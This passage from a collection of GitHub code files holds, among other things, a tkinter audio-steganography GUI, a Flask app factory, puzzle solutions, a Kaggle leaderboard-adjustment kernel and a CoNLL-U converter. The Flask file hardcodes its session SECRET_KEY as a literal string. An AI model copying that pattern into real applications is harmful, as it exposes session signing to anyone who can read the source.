a File Explorer label\nlabel_file_explorer = Label(window,\n text = \"Choose an audio file\",\n width = 40,\n height = 4)\n\nlabel = Label(window,\n text = \"Enter your message :\",\n width = 40,\n height = 2,\n anchor = S)\n \n \nbutton_explore = Button(window,\n text = \"Browse Files\",\n width = 17,\n command = browseFiles)\nbutton_encode = Button(window,\n text = \"Encode Audio File\",\n anchor = N,\n command = lambda: encode(filepath, text))\nbutton_decode = Button(window,\n text = \"Decode Audio File\",\n command = lambda: decode(frame))\n\ntext = Text(window, wrap = WORD)\nScrollBar = 
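Stripped of the tkinter plumbing, the encoder in the record above is classic least-significant-bit WAV steganography. A file-to-file sketch of just that core; the paths are placeholders, the '#' padding matches the record's end-of-message convention, and the message is assumed to fit in the carrier.

import wave

def embed_message(in_path: str, out_path: str, message: str) -> None:
    """Hide `message` in the lowest bit of each audio byte."""
    with wave.open(in_path, "rb") as audio:
        params = audio.getparams()
        frames = bytearray(audio.readframes(audio.getnframes()))
    message += "#" * (len(frames) // 8 - len(message))  # pad to fill the carrier
    bits = [int(b) for ch in message for b in format(ord(ch), "08b")]
    for i, bit in enumerate(bits):
        frames[i] = (frames[i] & 254) | bit  # clear the LSB, then set it to the bit
    with wave.open(out_path, "wb") as out:
        out.setparams(params)
        out.writeframes(bytes(frames))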
Scrollbar(text)\nScrollBar.config(command=text.yview)\ntext.config(yscrollcommand=ScrollBar.set)\nScrollBar.pack(side=RIGHT, fill= Y)\n\n\nlabel_file_explorer.pack()\n\nbutton_explore.pack()\nlabel.pack()\ntext.pack(fill = X, ipady = 60)\nbutton_encode.pack() # #\nline = Label(window, text = \"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\nline.pack()\nbutton_decode.pack()\nframe = LabelFrame(window, text = \"HIDDEN MESSAGE\") # Create new frame\nframe.pack(fill = X)\n\ncanvas = Canvas(frame, bg = \"black\")\nscrollbar = Scrollbar(frame, orient=\"vertical\", command=canvas.yview)\nscrollable_frame = Frame(canvas)\n\nscrollable_frame.bind(\"\", lambda e: canvas.configure(scrollregion = canvas.bbox(\"all\")))\n\ncanvas.create_window((0, 0), window = scrollable_frame, anchor =\"nw\")\ncanvas.configure(yscrollcommand=scrollbar.set)\n\ncanvas.pack(side=\"left\", fill=\"both\", expand=True)\nscrollbar.pack(side=\"right\", fill=\"y\")\n\n\n \n# Let the window wait for any events\nwindow.mainloop()","repo_name":"MinhDuckky/dsp2021","sub_path":"DreamcatcherAudio.py","file_name":"DreamcatcherAudio.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18039219394","text":"\"\"\" Application initializer.\"\"\"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import path\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\nbasedir = path.abspath(path.dirname(__file__))\nDB_NAME = \"database.db\"\n\n\ndef create_app():\n \"\"\" App creation and initialization function.\"\"\"\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'jhgjetdjq wjgkfc'\n app.config['SQLALCHEMY_DATABASE_URI'] = \\\n 'sqlite:///' + path.join(basedir, DB_NAME)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n from .views import views\n from .auth import auth\n\n app.register_blueprint(views, url_prefix='/')\n app.register_blueprint(auth, url_prefix='/')\n\n from .models import Server, User\n\n with app.app_context():\n db.create_all()\n\n login_manager = LoginManager()\n login_manager.login_view = 'auth.login' # type: ignore\n login_manager.init_app(app)\n\n @login_manager.user_loader\n def load_user(id):\n return User.query.get(int(id))\n\n return app\n","repo_name":"bryansomto/Web-server_configurator","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74789814887","text":"import sys\nT = int(input())\n\nfor i in range(T):\n result = input()\n sum = 0\n score = 0\n for j in result:\n if j == \"X\":\n score = 0\n sum += score\n else :\n score += 1\n sum += score\n print(sum)\n\n\n","repo_name":"deltaori0/Python-Algorithm","sub_path":"baekjoon/step-by-step/step05/8958.py","file_name":"8958.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"254459179","text":"class Solution:\n def maxOperations(self, nums: List[int], k: int) -> int:\n pair_map, operations = defaultdict(int), 0\n for num in nums:\n #If pair found increment operations\n if pair_map[num]:\n operations += 1\n pair_map[num] -= 1\n else:\n pair_map[k- num] += 1\n return operations","repo_name":"gdsaikrishna/leet_code","sub_path":"1679. Max Number of K-Sum Pairs.py","file_name":"1679. 
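The `maxOperations` solution that begins above uses a one-pass hash map: each number either completes a previously requested partner or registers `k - num` as the partner it is waiting for. The same idiom outside the LeetCode class wrapper:

from collections import defaultdict

def max_operations(nums: list, k: int) -> int:
    """Count disjoint pairs summing to k in a single pass."""
    waiting = defaultdict(int)  # value -> how many pairs still need it
    operations = 0
    for num in nums:
        if waiting[num]:
            operations += 1  # this number completes a pending pair
            waiting[num] -= 1
        else:
            waiting[k - num] += 1
    return operations

assert max_operations([1, 2, 3, 4], 5) == 2
assert max_operations([3, 1, 3, 4, 3], 6) == 1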
Max Number of K-Sum Pairs.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16775422318","text":"from dotenv import load_dotenv\nfrom event import Event\n\nimport os\nimport icalendar\nimport urllib3\n\n\nload_dotenv()\n\n\nclass IcalParser:\n\n \n def fetch_data(self) -> None:\n self.__save_to_file(self.__fetch_data_of_url())\n\n\n def __fetch_data_of_url(self) -> bytes:\n response = urllib3.request(\"GET\", os.getenv(\"ICAL_URL\"))\n if (response.status == 200):\n return response.data\n \n print(f\"Invalid status code: {response.status}\")\n exit(1)\n\n\n def __save_to_file(self, data: bytes) -> None:\n with open(\"../icalFile.ics\", \"wb\") as ical_file: \n ical_file.write(data)\n\n def construct_events(self) -> list[Event]:\n calendar = icalendar.Calendar.from_ical(open(\"../icalFile.ics\", \"rb\").read())\n events: list[Event] = []\n for event in calendar.walk(\"VEVENT\"):\n if (event.get(\"RRULE\") != None):\n recurrence = event.get(\"RRULE\").to_ical().decode(\"utf-8\")\n else:\n recurrence = \"\"\n events.append(Event(\n summary=event.get(\"SUMMARY\").to_ical().decode(\"utf-8\"),\n description=\"\" if event.get(\"DESCRIPTION\") == None else event.get(\"DESCRIPTION\").to_ical().decode(\"utf-8\"),\n color_id=6,\n start=event.get(\"DTSTART\").to_ical().decode(\"utf-8\"),\n end=event.get(\"DTEND\").to_ical().decode(\"utf-8\"),\n location=event.get(\"LOCATION\").to_ical().decode(\"utf-8\") ,\n recurrence=recurrence\n ))\n return events\n ","repo_name":"Raboro/rapla-google-calendar-sync","sub_path":"src/icalparser.py","file_name":"icalparser.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10148626145","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Manual Model Manipulation Trick\n# In this kernel, we load a public Kaggle model's submission file, view it's malware infection rate over time, and modify it manually to match what train.csv's malware rate looks like over time. The original submission file scores Public LB 0.689 and Private LB 0.635. After correction, the updated file scores Public LB 0.693 and Private LB 0.750. \n# \n# I used this trick during the competition to increase Public LB score. But it wasn't until after the competition's end that I learned how to increase Private LB score. In the private test dataset, all computers on and after November 20, 2018 have `HasDetections=0` approximately. (Why is this?)\n\n# In[ ]:\n\n\n# IMPORT LIBRARIES\nimport pandas as pd, numpy as np, os, gc\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom datetime import timedelta\n\n# # Load files and time stamps\n# We will load the output from [Hung The Nguyen's][1] kernel [here][2]. 
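The `IcalParser` record above walks `VEVENT` components with the icalendar package. A trimmed-down traversal showing the same API surface; 'calendar.ics' is a placeholder path.

import icalendar

with open("calendar.ics", "rb") as f:
    calendar = icalendar.Calendar.from_ical(f.read())

for event in calendar.walk("VEVENT"):
    summary = event.get("SUMMARY")
    start = event.get("DTSTART")
    if summary is not None and start is not None:
        # to_ical() yields bytes, hence the explicit decode
        print(summary.to_ical().decode("utf-8"), start.to_ical().decode("utf-8"))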
And attach time stamps.\n# \n# [1]: https://www.kaggle.com/hung96ad\n# [2]: https://www.kaggle.com/hung96ad/new-blend\n\n# In[ ]:\n\n\n# Lower detection rate for August and September computers\nAdjustPublicScore = True\n# 0=No, 1=Remove Nov 20,21,22,23,24,25, 2=Downward trend Nov 20,21,22,23,24,25\nAdjustPrivateScore = 2\n\ndtypes = {}\ndtypes['MachineIdentifier'] = 'str'\ndtypes['AvSigVersion'] = 'category'\ndtypes['HasDetections'] = 'int8'\n\n# LOAD TRAIN DATA\ndf_train = pd.read_csv('../input/microsoft-malware-prediction/train.csv', usecols=list(dtypes.keys()), dtype=dtypes)\nprint ('Loaded',len(df_train),'rows of train.CSV!')\n\n# LOAD TEST DATA\ndf_test = pd.read_csv('../input/microsoft-malware-prediction/test.csv', usecols=list(dtypes.keys())[0:-1], dtype=dtypes)\nprint ('Loaded',len(df_test),'rows of test.CSV!')\n\n# LOAD PREDICTIONS FROM PUBLIC KERNEL\n# https://www.kaggle.com/hung96ad/new-blend\ndf_test2 = pd.read_csv('../input/kagglebest/super_blend.csv')\nprint ('Loaded',len(df_test),'rows of super_blend.csv!')\n\n# ADD TIMESTAMPS\ndatedictAS = np.load('../input/malware-timestamps/AvSigVersionTimestamps.npy')[()]\ndf_test['Date'] = df_test['AvSigVersion'].map(datedictAS)\ndf_train['Date'] = df_train['AvSigVersion'].map(datedictAS)\ndf_test2 = pd.merge(df_test2, df_test, on='MachineIdentifier', how='left')\ndf_test2['AvSigVersion2'] = df_test2['AvSigVersion'].map(lambda x: np.int(x.split('.')[1]) )\n\n# In[ ]:\n\n\nimport calendar, math\n\ndef staticPlot(data, col, target='HasDetections', bars=10, show=1.0, sortby='frequency'\n , verbose=1, top=5, title='',asc=False, dropna=False, minn=0.0):\n # calcuate density and detection rate\n cv = data[col].value_counts(dropna=dropna)\n cvd = cv.to_dict()\n nm = cv.index.values; lnn = len(nm); lnn2 = lnn\n th = show * len(data)\n th2 = minn * len(data)\n sum = 0; lnn2 = 0\n for x in nm[0:bars]:\n lnn2 += 1\n try: sum += cvd[x]\n except: sum += cv[x]\n if sum>th:\n break\n try:\n if cvd[x]start) & (data['Date']th:\n break\n top = min(top,len(nm))\n top2 = min(top2,len(nm),lnn2,top)\n\n # calculate rate within each time interval\n diff = (end-start).days*24*3600 + (end-start).seconds\n size = diff//(3600*((inc_mn * 28 + inc_dy) * 24 + inc_hr)) + 5\n data_counts = np.zeros([size,2*top+1],dtype=float)\n idx=0; idx2 = {}\n for i in range(top):\n idx2[nm[i]] = i+1\n low = start\n high = add_time(start,inc_mn,inc_dy,inc_hr)\n data_times = [low+(high-low)/2]\n while low=low) ]\n #data_counts[idx,0] = len(slice)\n data_counts[idx,0] = 5000*len(slice['AvSigVersion'].unique())\n for key in idx2:\n if nan_check(key): slice2 = slice[slice[col].isna()]\n else: slice2 = slice[slice[col]==key]\n data_counts[idx,idx2[key]] = len(slice2)\n if target in data:\n data_counts[idx,top+idx2[key]] = slice2['HasDetections'].mean()\n low = high\n high = add_time(high,inc_mn,inc_dy,inc_hr)\n data_times.append(low+(high-low)/2)\n idx += 1\n\n # plot lines\n fig = plt.figure(1,figsize=(15,3))\n cl = ['r','g','b','y','m']\n ax3 = fig.add_subplot(1,1,1)\n lines = []; labels = []\n if z==1: ax3.plot(data_times,data_counts[0:idx+1,0],'k')\n for i in range(top):\n tmp, = ax3.plot(data_times,data_counts[0:idx+1,i+1],cl[i%5])\n if dots: ax3.plot(data_times,data_counts[0:idx+1,i+1],cl[i%5]+'o')\n lines.append(tmp)\n labels.append(str(nm[i]))\n ax3.spines['left'].set_color('red')\n ax3.yaxis.label.set_color('red')\n ax3.tick_params(axis='y', colors='red')\n if col!='ones': ax3.set_ylabel('Category Density', color='r')\n else: ax3.set_ylabel('Data Density', color='r')\n 
#ax3.set_yticklabels([])\n if target in data:\n ax4 = ax3.twinx()\n for i in range(top2):\n ax4.plot(data_times,data_counts[0:idx+1,i+1+top],cl[i%5]+\":\")\n if dots: ax4.plot(data_times,data_counts[0:idx+1,i+1+top],cl[i%5]+\"o\")\n ax4.spines['left'].set_color('red')\n ax4.set_ylabel('Detection Rate', color='k')\n if title!='': plt.title(title)\n if legend==1: plt.legend(lines,labels,loc=2)\n plt.show()\n \n# INCREMENT A DATETIME\ndef add_time(sdate,months=0,days=0,hours=0):\n month = sdate.month -1 + months\n year = sdate.year + month // 12\n month = month % 12 + 1\n day = sdate.day + days\n if day>calendar.monthrange(year,month)[1]:\n day -= calendar.monthrange(year,month)[1]\n month += 1\n if month>12:\n month = 1\n year += 1\n hour = sdate.hour + hours\n if hour>23:\n hour = 0\n day += 1\n if day>calendar.monthrange(year,month)[1]:\n day -= calendar.monthrange(year,month)[1]\n month += 1\n if month>12:\n month = 1\n year += 1\n return datetime(year,month,day,hour,sdate.minute)\n\n# CHECK FOR NAN\ndef nan_check(x):\n if isinstance(x,float):\n if math.isnan(x):\n return True\n return False\n\n# # First, view train's malware probabilities\n# We notice that computers with AvSigVersion dates outside the window of sampling have lower malware probabilities. In the plot below, the dotted line uses the right y-axis and solid line uses left y-axis.\n\n# In[ ]:\n\n\ndf_train['ones'] = 1\ndynamicPlot(df_train,'ones',title='Training data. (Dotted line uses right y-axis. Solid uses left.)')\n\n# # Second, view original submission's malware probabilities\n# We notice that the probabilities before and after the sampling window should be lower. So we should correct them.\n\n# In[ ]:\n\n\ndf_test2['ones'] = 1\ndynamicPlot(df_test2,'ones',title='Original submission')\ndynamicPlot(df_test2,'AvSigVersion2',start=datetime(2018,9,1),end=datetime(2018,11,29),inc_dy=1,top2=4, dots=True)\n\n# # Third, adjust probabilities before and after sampling window\n# We will lower probabilities before September 26, 2018 and after November 20, 2018.\n\n# In[ ]:\n\n\nif AdjustPublicScore: df_test2.loc[ (df_test2['AvSigVersion2']==275)|(df_test2['AvSigVersion2']==273),'HasDetections'] *= 0.6\n\n# In[ ]:\n\n\ndynamicPlot(df_test2,'ones',title='Adjustment 1')\ndynamicPlot(df_test2,'AvSigVersion2',start=datetime(2018,9,1),end=datetime(2018,11,29),inc_dy=1,top2=4, dots=True)\n\n# In[ ]:\n\n\nif AdjustPrivateScore==1:\n df_test2.loc[ df_test2['Date']>datetime(2018,11,20,4,0) ,'HasDetections'] = 0\nelif AdjustPrivateScore==2:\n df_test2['X'] = df_test2['Date'] - datetime(2018,11,20,4,0) \n df_test2['X'] = df_test2['X'].map(lambda x: x.total_seconds()/86400)\n df_test2['X'].fillna(0,inplace=True)\n s = 5.813888\n df_test2['F'] = 1.0\n df_test2['F'] = 1 - df_test2['X']/s\n df_test2.loc[df_test2['X']<=0,'F'] = 1.0\n df_test2.loc[df_test2['X']>s,'F'] = 0\n df_test2['HasDetections'] *= df_test2['F']\n\n# In[ ]:\n\n\ndynamicPlot(df_test2,'ones',title='Adjustment 2')\ndynamicPlot(df_test2,'AvSigVersion2',start=datetime(2018,9,1),end=datetime(2018,11,29),inc_dy=1,top2=4,\n dots=True, title='adjustment 2')\n\n# # Submit updated submission file\n# The original submission file had Public/Private LB 0.698/0.635. The new updated file has Public/Private LB 0.693/0.750. 
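Adjustment 2 in the kernel above multiplies predictions by a factor that ramps linearly from 1 to 0 over roughly 5.8 days past November 20, 2018. The per-row factor, extracted from the vectorized pandas code:

from datetime import datetime

CUTOFF = datetime(2018, 11, 20, 4, 0)
SPAN_DAYS = 5.813888  # length of the linear ramp used in the kernel

def decay_factor(date: datetime) -> float:
    """1.0 before the cutoff, 0.0 after the ramp, linear in between."""
    days_past = (date - CUTOFF).total_seconds() / 86400
    if days_past <= 0:
        return 1.0
    if days_past > SPAN_DAYS:
        return 0.0
    return 1.0 - days_past / SPAN_DAYS

assert decay_factor(datetime(2018, 11, 19)) == 1.0
assert decay_factor(datetime(2018, 12, 1)) == 0.0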
Using this trick, one can correct the top Kaggle Microsoft Malware public kernel submission files, ensemble them, and score over 0.700 Public LB (and over 0.750 Private LB).\n\n# In[ ]:\n\n\ndf_test2[['MachineIdentifier','HasDetections']].to_csv('PrivateLeaderboard.csv', index=False)\n\n# ![image](http://playagricola.com/Kaggle/private331419.png)\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample972.py","file_name":"sample972.py","file_ext":"py","file_size_in_byte":12212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72174026088","text":"#!usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------------------------\n# author: bitPanG98\n# direccion: bitpang98@gmail.com\n#\n# descripcion: Algoritmo desarrollado para planificar procesos\n# utilizando el algoritmo de planificacion FIFO.\n#-----------------------------------------------------------------------------------------------\n\n#modulos\nimport string\n\n\n#---------------------- variables a utilizar -----------------------\n\nnombre_proceso = string.ascii_uppercase\n\n\n\n#---------------------- funciones ---------------------\ndef graficar_linea():\n \"\"\"\n Funcion que permite graficar una linea grafica\n \"\"\"\n \n grafica_linea = \"|----\"*10\n \n return grafica_linea+\"|\"\n \n \ndef mostrar_serienumerica():\n \"\"\"\n Funcion que permite mostrar una sucesion numerica segun un rango\n de valores\n \"\"\"\n \n lista_serie = []\n serie_numerica = \"\"\n \n #creamos valores segun un rango y los almacenamos en una lista\n for num in range(0,11):\n lista_serie.append(num)\n\n #recorremos los valores de nuestra lista\n for num in lista_serie:\n #verificamos cuantos espacios dejaremos entre cada numero\n if num < 10:\n serie_numerica += str(num)+\" \"\n \n else:\n serie_numerica += str(num)+\" \"\n \n return serie_numerica\n\n\ndef graficar_barras(lista_rafagascpu):\n \"\"\"\n Funcion que permite graficar barras, recibiendo una lista con los valores\n a graficar.\n \"\"\"\n ancho = 5\n elaborar_grafica = \"\"\n \n colores = [\n \"\\033[41m\" , \"\\033[42m\" , \"\\033[43m\" , \"\\033[44m\" ,\n \"\\033[45m\" , \"\\033[46m\" , \"\\033[47m\"\n ]\n\n for rafaga in lista_rafagascpu:\n \n for color in colores:\n elaborar_grafica += color+str(ancho*rafaga)\n \nprint(\"\\033[40m\"+graficar_linea())\nprint(mostrar_serienumerica())\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bitPanG98/Ejercicios","sub_path":"Python/Algoritmo-FCFS/metodo1_fcfs/util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5172500056","text":"# Solution to advent of code Day 2 puzzle 1\n\nfile = open(\"input.txt\", \"r\")\n\n\n#Values for the card picked by player\nvalueDict = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n}\n\n# Initializes a score\nscore = 0\n\n# For each line in the file\nfor line in file:\n # Initializes results to false\n win = False\n draw = False\n loss = False\n\n # Saves the card chosen by opponent\n opponent = line[0]\n # Saves the card chosen by player\n player = line[2]\n\n #If opponent picked Rock\n if opponent == 'A':\n if player == 'X':\n draw = True\n elif player == 'Y':\n win = True\n elif player == 'Z':\n loss = True\n #If opponent picked Paper\n elif opponent == 'B':\n if player == 'X':\n loss = True\n elif 
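The FCFS utility record above leaves `graficar_barras` unfinished: it concatenates color codes into a string it never returns. A minimal working sketch of what I take the intent to be — one proportional ASCII bar per CPU burst — with English identifiers of my own choosing:

def draw_bars(burst_times: list) -> str:
    """One ASCII bar per process; bar length is proportional to the burst."""
    lines = []
    for i, burst in enumerate(burst_times):
        lines.append(f"P{i}: " + "#" * burst + f"  ({burst})")
    return "\n".join(lines)

print(draw_bars([3, 5, 2]))
# P0: ###  (3)
# P1: #####  (5)
# P2: ##  (2)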
player == 'Y':\n draw = True\n elif player == 'Z':\n win = True\n #If opponent picked Scissor\n elif opponent == 'C':\n if player == 'X':\n win = True\n elif player == 'Y':\n loss = True\n elif player == 'Z':\n draw = True\n\n # Adds points depending on the result\n if win == True:\n score += 6 + valueDict[player]\n elif draw == True:\n score += 3 + valueDict[player]\n elif loss == True:\n score += valueDict[player]\n\n\n\nprint(score)\n","repo_name":"Fillewow/Advent_of_code_2022","sub_path":"2/Puzzle_1.py","file_name":"Puzzle_1.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28276092344","text":"\"\"\"Script for extracting metadata about a given paper on JOSS\"\"\"\nimport sys\nimport json\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport lxml\nfrom dateutil.parser import parse\n\ndef get_response(page_url):\n \"\"\"Returns response to html request on page_url\"\"\"\n response = requests.get(page_url)\n # print(page_url, response.status_code)\n return response\n\ndef main():\n \"\"\"Main function\"\"\"\n url = sys.argv[1]\n response = get_response(url)\n soup = bs(response.content, 'lxml')\n\n # find meta block\n meta = soup.find('div', class_='paper-meta')\n\n # extract title\n title = meta.h1.string\n # print(title)\n\n # extract submission and publish dates\n date_spans = meta.find_all('span', class_='small')\n date_strings = [\n parse(\" \".join(span.string.split()[1:]))\n for span in date_spans\n ]\n # print(date_strings)\n\n # extract language tags\n lang_spans = meta.find_all('span', class_='badge-lang')\n lang_tags = [span.string for span in lang_spans]\n # print(lang_tags)\n\n # Find sidebar\n sidebar = soup.find('div', class_='paper-sidebar')\n # print(sidebar)\n\n # Extract field tags\n tag_spans = sidebar.find_all('span', class_='badge-lang')\n field_tags = [span.string for span in tag_spans]\n # print(field_tags)\n\n # Extract software repo url\n repo_url = soup.find('a', class_='paper-btn').get('href')\n # print(repo_url)\n\n data = {\n \"title\": title,\n \"submission_date\": str(date_strings[0]),\n \"publish_date\": str(date_strings[1]),\n \"lang_tags\": lang_tags,\n \"field_tags\": field_tags,\n \"repo_url\": repo_url\n }\n\n print(json.dumps(data))\n\nmain()\n","repo_name":"JamieJQuinn/joss-scraper","sub_path":"fetch_paper_details.py","file_name":"fetch_paper_details.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42394756465","text":"import os\nfrom dotenv import load_dotenv\nload_dotenv(\".env\")\nCLIENT_ID = os.getenv(\"CLIENT_ID\")\n\nCLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\n# In a production app, we recommend you use a more secure method of storing your secret,\n# like Azure Key Vault. 
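The Advent of Code solution completed above enumerates every opponent/player combination with nested conditionals. A table-driven equivalent that scores a round the same way (6 for a win, 3 for a draw, plus the value of the shape played):

SHAPE_SCORE = {"X": 1, "Y": 2, "Z": 3}
BEATS = {"X": "C", "Y": "A", "Z": "B"}  # player shape -> opponent shape it defeats
DRAWS = {"X": "A", "Y": "B", "Z": "C"}

def round_score(opponent: str, player: str) -> int:
    """Score one rock-paper-scissors round from the two column letters."""
    outcome = 6 if BEATS[player] == opponent else 3 if DRAWS[player] == opponent else 0
    return outcome + SHAPE_SCORE[player]

assert round_score("A", "Y") == 8  # paper beats rock: 6 + 2
assert round_score("B", "X") == 1  # rock loses to paper: 0 + 1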
Or, use an environment variable as described in Flask's documentation:\n# https://flask.palletsprojects.com/en/1.1.x/config/#configuring-from-environment-variables\n# CLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\n# if not CLIENT_SECRET:\n# raise ValueError(\"Need to define CLIENT_SECRET environment variable\")\n\nTENANT_ID = os.getenv(\"TENANT_ID\")\nAUTHORITY = f\"https://login.microsoftonline.com/{TENANT_ID}\" # For multi-tenant app\n# AUTHORITY = \"https://login.microsoftonline.com/Enter_the_Tenant_Name_Here\"\n\nREDIRECT_PATH = \"/get_auth_token\" # Used for forming an absolute URL to your redirect URI.\n# The absolute URL must match the redirect URI you set\n# in the app's registration in the Azure portal.\n\n# You can find more Microsoft Graph API endpoints from Graph Explorer\n# https://developer.microsoft.com/en-us/graph/graph-explorer\nENDPOINT = \"https://graph.microsoft.com/v1.0/users\" # This resource requires no admin consent\n\n\n# You can find the proper permission names from this document\n# https://docs.microsoft.com/en-us/graph/permissions-reference\nSCOPE = [\"User.ReadBasic.All\"]\n\nSESSION_TYPE = \"filesystem\" # Specifies the token cache should be stored in server-side session\nAPPLICATIONINSIGHTS_CONNECTION_STRING = os.getenv(\"APPLICATIONINSIGHTS_CONNECTION_STRING\")\nDB_ACCOUNT_URI = os.getenv(\"DB_ACCOUNT_URI\")\nDB_ACCOUNT_KEY = os.getenv(\"DB_ACCOUNT_KEY\")\nDB_NAME = os.getenv(\"DB_NAME\")\nDB_CONTAINER_NAME = os.getenv(\"DB_CONTAINER_NAME\")\nPORT = os.getenv(\"PORT\")\nVOTING_SERVICE_URL=os.getenv(\"VOTING_SERVICE_URL\")\nFUNCTION_KEY=os.getenv(\"FUNCTION_KEY\")","repo_name":"mateuszGorczany/Oceniaczka","sub_path":"app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14427076528","text":"# Author: Theresa Schmidt, 2021 \n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"\nCreates CoNLL-U formatted tsv files from our tagger's or parser's output files.\nAlso creates files for error analysis.\n\n1. Analysis mode (default): Takes AllenNLP prediction for sequence tags and\n complementary annotated (gold) file. Prints all columns of the annotated\n file plus an extra column for wrongly predicted tokens into a tab separated file.\n2. tagger prediction2conllu: takes a tagging prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n3. parser prediction2conllu: takes a parsing prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n\nTested with Python 3.7\n\nReferences:\n - Lin et al. 
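The `app_config.py` record above reads every setting with `os.getenv`, which silently yields `None` for anything missing. Its own commented-out snippet suggests failing fast instead; a small helper generalizing that suggestion, with names mirroring the record:

import os
from dotenv import load_dotenv

load_dotenv(".env")

def require_env(name: str) -> str:
    """Return the variable's value or fail loudly at import time."""
    value = os.getenv(name)
    if not value:
        raise ValueError(f"Need to define {name} environment variable")
    return value

CLIENT_SECRET = require_env("CLIENT_SECRET")
TENANT_ID = require_env("TENANT_ID")
AUTHORITY = f"https://login.microsoftonline.com/{TENANT_ID}"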
(2020).\n A recipe for creating multimodal aligned datasets for sequential tasks.\n In Proceedings of the58th Annual Meeting of the Association for Computational Linguistics, pages 4871–4884, Online.\n Association for Computational Linguistics.\n - CoNLL-U: https://universaldependencies.org/format.html\n\"\"\"\n\nimport argparse\nimport json\nfrom ast import literal_eval\nimport logging\n\n\ndef read_prediction_tokens(pred_file):\n \"\"\"\n Reads in the tokens from the tagger's output file.\n\n Returns: a String list\n \"\"\"\n tokens = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n tokens.extend(j[\"words\"])\n return tokens\n\n\ndef read_prediction_tags(pred_file):\n \"\"\"\n Reads in the predicted tags from the tagger's output file. Or the\n tags used as part of the input for the parser.\n Also determines the source of the data, i.e. whether it was\n generated by the tagger or the parser.\n\n Returns: a String list with the predicted tags.\n \"\"\"\n model_type = None\n tags = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n try:\n tags.extend(j[\"tags\"])\n model_type = \"tagger\"\n except KeyError:\n tags.extend(j[\"pos\"])\n model_type = \"parser\"\n return tags, model_type\n\n\ndef read_prediction_dependencies(pred_file):\n \"\"\"\n Reads in the predictions from the parser's output file.\n\n Returns: two String list with the predicted heads and dependency names, respectively.\n \"\"\"\n heads = []\n deps = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n heads.extend(j[\"predicted_heads\"])\n deps.extend(j[\"predicted_dependencies\"])\n heads = list(map(str, heads))\n return heads, deps\n\n\ndef write_with_misjudgements(gold, prediction, goldlines, out_file):\n \"\"\"\n Writes a tsv file with the first columns repeating the gold annotated\n file. The last column contains all predictions that do not match the\n gold annotation. If the prediction was correct, the last column in\n that line stays empty.\n \"\"\"\n with open(out_file, \"w\", encoding=\"utf-8\") as f:\n for g, p, line in zip(gold, prediction, goldlines):\n s = \"\\t\".join(line)\n if g != p:\n s += \"\\t\" + str(p)\n f.write(s + \"\\n\")\n\n\ndef _read_gold_conllu_simplified(gold_file):\n \"\"\"\n Reads in the gold annotation from a file in CoNLL-U format.\n WARNING: Does not read in extra edges in 9th column!\n\n Returns:\n - tags: a String list containing one sequence tag per line.\n E.g. [B-Kochschritt, L-Kochschritt, U-Zutat, O]\n - heads: a String list containing one head reference (its token ID)\n per line.\n - deps: a String list containing one dependency name per line for the\n relation between the token in that line and the token at the\n ID of 'head'.\n - lines: a list list containing the original line split at \"\\t\"\n \"\"\"\n tags = []\n heads = []\n deps = []\n lines = []\n with open(gold_file, encoding=\"utf-8\") as f:\n for line in f:\n if line == \"\\n\":\n continue\n line = line.split(\"\\t\")\n try:\n tags.append(line[4])\n heads.append(line[6])\n deps.append(line[7])\n except IndexError:\n raise IndexError(\n f\"Gold file {gold_file} probably isn't written in CoNLL-U format.\"\n 